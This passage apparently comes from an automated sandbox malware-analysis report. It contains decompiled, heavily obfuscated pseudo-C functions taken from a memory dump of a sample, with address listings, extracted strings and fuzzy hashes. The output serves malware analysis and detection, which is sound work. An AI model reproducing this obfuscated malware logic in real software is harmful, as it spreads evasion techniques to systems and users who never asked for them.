				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x24ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x24ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0023F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002388E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x24c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00238736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0023568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00236754
0x0023675a
0x0023675f
0x00236767
0x0023676f
0x00236777
0x0023677c
0x00236784
0x0023678c
0x00236794
0x0023679c
0x002367a4
0x002367a9
0x002367b1
0x002367b8
0x002367bc
0x002367cb
0x002367cf
0x002367d1
0x002367db
0x002367e3
0x002367e5
0x002367ed
0x002367f2
0x002367fa
0x00236809
0x0023680c
0x00236810
0x0023681d
0x00236821
0x00236829
0x00236839
0x0023683d
0x00236842
0x0023684a
0x00236852
0x00236857
0x0023685f
0x00236867
0x0023686b
0x00236877
0x0023687a
0x0023687e
0x00236882
0x0023688a
0x00236892
0x00236897
0x0023689c
0x002368a4
0x002368a4
0x002368b2
0x00236984
0x00236987
0x0023698c
0x0023698f
0x00000000
0x0023698f
0x002368be
0x002368c6
0x00000000
0x00236981
0x002368d2
0x00000000
0x002368d8
0x002368de
0x002368e6
0x002368f0
0x002368f8
0x002368f9
0x00000000
0x002368f9
0x0023699f
0x0023699f
0x0023699f
0x0023690d
0x00236911
0x00236912
0x00236917
0x0023691a
0x0023691d
0x0023691f
0x00000000
0x0023691f
0x00000000
0x0023691d
0x00236929
0x0023692a
0x00236934
0x00236935
0x00236939
0x0023693b
0x0023693f
0x00236943
0x00236945
0x0023694a
0x0023694f
0x0023695b
0x00000000
0x00236951
0x00236951
0x00000000
0x00236951
0x00000000
0x00236960
0x00236960
0x00000000

Strings

:z, xrefs: 0023677C
r<-$, xrefs: 002368CC
u, xrefs: 0023688A
zA, xrefs: 00236882
r<-$, xrefs: 0023691F

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
Instruction ID: f3af6f531a140bdd196b3ef3c74a434b9fb8403054edc712698feacff5f812af
Opcode Fuzzy Hash: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
Instruction Fuzzy Hash: 7A519BB1518302AFD318CF26C54961FBBE4EBC8758F10891DF4D8A62A0D7B4DA19CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0023839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0023839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00248C8F(_t189);
				_t217 = _v28 + E00248C8F(_t189) % _v52;
				_t184 = _v20 + E00248C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0023D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x002383a0
0x002383aa
0x002383b2
0x002383b7
0x002383bf
0x002383d1
0x002383d5
0x002383dc
0x002383df
0x002383e3
0x002383e8
0x002383f0
0x002383fd
0x00238401
0x00238406
0x0023840e
0x00238416
0x0023841e
0x00238426
0x0023842e
0x00238436
0x0023843e
0x00238446
0x0023844e
0x00238456
0x0023845e
0x00238466
0x0023846e
0x00238476
0x0023847e
0x00238483
0x00238490
0x00238494
0x0023849c
0x002384a8
0x002384ad
0x002384b3
0x002384bb
0x002384c3
0x002384cb
0x002384d0
0x002384d8
0x002384e0
0x002384e8
0x002384f0
0x002384f8
0x00238500
0x00238508
0x00238510
0x00238515
0x0023851d
0x00238525
0x00238531
0x00238536
0x0023853c
0x00238544
0x00238551
0x00238552
0x0023855c
0x00238560
0x00238568
0x00238570
0x00238578
0x00238580
0x00238584
0x0023858c
0x002385a1
0x002385c2
0x002385d9
0x002385dd
0x002385e2
0x002385e4
0x002385e6
0x002385ee
0x002385f0
0x002385f2
0x002385f5
0x0023860f
0x00238619
0x00238623

Strings

Qv, xrefs: 0023853C
o9, xrefs: 00238584
KB, xrefs: 00238500
H', xrefs: 002383E8
BQ{*, xrefs: 0023841E

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: a2c1dafa6e4ae7dd7163a34a47f8d035f325ec48cf95caaa5c5dad6c234790c2
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: F86101711093419FD348CF25D58A50FBBE1FBC8748F408A1DF1DA96260D7B9DA198F86

Uniqueness

Uniqueness Score: -1.00%

Function 00235B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00235B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0024023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00238736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00242674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0023F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00238736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0023F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00235b79
0x00235b79
0x00235b80
0x00235b84
0x00235b88
0x00235b92
0x00235b99
0x00235ba1
0x00235ba9
0x00235bae
0x00235bb6
0x00235bbe
0x00235bc6
0x00235bce
0x00235bd6
0x00235bde
0x00235be7
0x00235beb
0x00235bf0
0x00235bfd
0x00235c02
0x00235c08
0x00235c10
0x00235c18
0x00235c1d
0x00235c25
0x00235c2d
0x00235c35
0x00235c3a
0x00235c47
0x00235c48
0x00235c4c
0x00235c54
0x00235c5c
0x00235c61
0x00235c69
0x00235c6e
0x00235c76
0x00235c7e
0x00235c86
0x00235c8e
0x00235c96
0x00235c9e
0x00235ca6
0x00235cae
0x00235cb6
0x00235cbe
0x00235cc6
0x00235cce
0x00235cd6
0x00235cde
0x00235ce6
0x00235cee
0x00235cf6
0x00235cfb
0x00235d03
0x00235d11
0x00235d15
0x00235d1d
0x00235d25
0x00235d32
0x00235d36
0x00235d3b
0x00235d43
0x00235d4d
0x00235d5b
0x00235d60
0x00235d66
0x00235d6e
0x00235d76
0x00235d7e
0x00235d82
0x00235d8a
0x00235d92
0x00235d9a
0x00235da2
0x00235daf
0x00235db0
0x00235db4
0x00235db8
0x00235dbc
0x00235dc4
0x00235dcc
0x00235dda
0x00235dde
0x00235de7
0x00235deb
0x00235df3
0x00235df7
0x00235e09
0x00235e66
0x00235e68
0x00235e6b
0x00235e71
0x00235f29
0x00000000
0x00235e77
0x00235e77
0x00235e7d
0x00000000
0x00235e83
0x00235e87
0x00235e89
0x00235e8d
0x00235e8f
0x00000000
0x00235e91
0x00235e95
0x00235ea0
0x00235ea1
0x00235ea2
0x00235eab
0x00235eb1
0x00000000
0x00235eb3
0x00235ec6
0x00235ed8
0x00235edd
0x00235edf
0x00235ee2
0x00235ee9
0x00235eec
0x00235ef0
0x00235ef4
0x00000000
0x00235ef6
0x00000000
0x00235ef6
0x00235ef4
0x00235eb1
0x00235e8f
0x00235e7d
0x00235e0b
0x00235e11
0x00235f00
0x00235f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00235e17
0x00235e1b
0x00235e28
0x00235e29
0x00235e2c
0x00235e31
0x00235e37
0x00235f0c
0x00235f0c
0x00235f12
0x00235f2d
0x00235f3a
0x00235f14
0x00235f14
0x00235f1a
0x00235f1c
0x00235f1c
0x00235e3d
0x00235e3d
0x00235e41
0x00235e43
0x00235e43
0x00235e47
0x00000000
0x00235e47
0x00235e37
0x00235e11
0x00235f28
0x00235f28
0x00235efb
0x00000000

Strings

b-, xrefs: 00235D66
z#, xrefs: 00235CFB
l', xrefs: 00235BBE
bA, xrefs: 00235C76

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: f40d58a301268e945a23b9e3aabd25d160faf049ba719d1082dafa4c6824e860
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: 2DA130B15187829FD368CF69C48980FBBE1BBC4718F548A1DF59587260D3B4DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 002380BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002380BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0023602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0024360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00238736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002450F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002461B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00237998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x002380c0
0x002380c8
0x002380c9
0x002380d0
0x002380d3
0x002380d4
0x002380d9
0x002380e1
0x002380e4
0x002380eb
0x002380f3
0x002380f8
0x0023810c
0x0023810d
0x00238111
0x00238116
0x0023811e
0x00238126
0x0023812a
0x00238132
0x0023813a
0x00238142
0x0023814a
0x00238152
0x00238160
0x00238164
0x0023816c
0x00238179
0x0023817d
0x00238185
0x0023818d
0x00238192
0x00238197
0x0023819f
0x002381a7
0x002381ac
0x002381b4
0x002381bc
0x002381c4
0x002381cc
0x002381d4
0x002381dc
0x002381e4
0x002381ec
0x002381f4
0x002381f9
0x00238201
0x0023820e
0x00238212
0x0023821c
0x0023821c
0x0023822e
0x002382c8
0x002382cd
0x002382d0
0x00000000
0x00238234
0x0023823a
0x0023829d
0x0023829e
0x002382a2
0x002382a7
0x002382ab
0x002382ad
0x002382af
0x00000000
0x002382af
0x0023823c
0x0023823e
0x00238282
0x00238287
0x0023828a
0x00000000
0x00238240
0x00238246
0x00238267
0x0023826a
0x00000000
0x00238248
0x0023824e
0x00000000
0x00238254
0x00238254
0x00238256
0x0023825b
0x00000000
0x0023825b
0x0023824e
0x00238246
0x0023823e
0x0023823a
0x00000000
0x0023822e
0x002382ef
0x002382f4
0x002382f7
0x002382fc
0x002382fc
0x002382fc
0x00238309
0x0023830b
0x0023830f
0x0023830f
0x00238316

Strings

XE, xrefs: 0023819F
+%, xrefs: 00238256
n(, xrefs: 00238201
+%, xrefs: 00238240

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: 9a908f72add2eaf95adf02977a606c566f141352fdc4931d8fd693337051bb70
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: 5A5166B01197429FC358DF20C88A82FBBF1BF84748F505A1DF5869A260D7B18A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00248D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00248D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002485BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0023E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00248D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00238736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00236636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00248d1f
0x00248d28
0x00248d2f
0x00248d3f
0x00248d44
0x00248d4a
0x00248d52
0x00248d5a
0x00248d5f
0x00248d67
0x00248d6f
0x00248d77
0x00248d7f
0x00248d87
0x00248d8f
0x00248d97
0x00248d9f
0x00248da7
0x00248daf
0x00248db7
0x00248dbf
